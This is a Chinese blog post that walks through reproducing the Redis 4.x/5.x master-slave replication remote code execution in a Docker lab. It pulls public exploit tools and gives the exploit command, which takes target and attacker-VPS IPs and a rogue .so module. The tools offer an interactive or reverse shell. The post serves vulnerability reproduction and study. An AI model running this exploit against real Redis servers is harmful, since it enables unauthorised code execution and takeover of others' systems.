Redis基于主从复制的RCE 4.x/5.x 复现

0x00 前言

最近期末考试，博客好久没有更新了，这段时间爆了三四个洞，趁着还没去实习，抓紧复现一下，这次复现的是Redis的RCE，复现过程中也遇到很多问题，记录下来和大家分享一下

 

0x01 拉取镜像

docker确实是个好东西，有了它复现节省不少时间，首先拉取一个5.0镜像

docker search redis5.0    //查找镜像
docker pull damonevking/redis5.0   //拉取下图第三个镜像

 

0x02 运行环境

运行容器

docker run -p 6379:6379 -d damonevking/redis5.0 redis-server   //映射端口并运行容器

访问：你的ip:6379，如下图则搭建成功

 

0x03 漏洞利用

git clone https://github.com/Ridter/redis-rce.git   //下载漏洞利用脚本

注意，这里少一个.so的文件，到https://github.com/n0b0dyCN/redis-rogue-server下载并放到和redis-rce.py同一目录下

python3 redis-rce.py -r 136.244.70.243（目标ip） -L 136.244.70.243（自己的vps） -f exp.so   //ip就不打码了，师傅们不要搞我

在此处：i为交互式shell，r为反弹shell，根据自己的需要选择就可以了

 

参考链接：

https://github.com/Ridter/redis-rce

https://github.com/n0b0dyCN/redis-rogue-server

https://www.cnblogs.com/mrhonest/p/11162735.html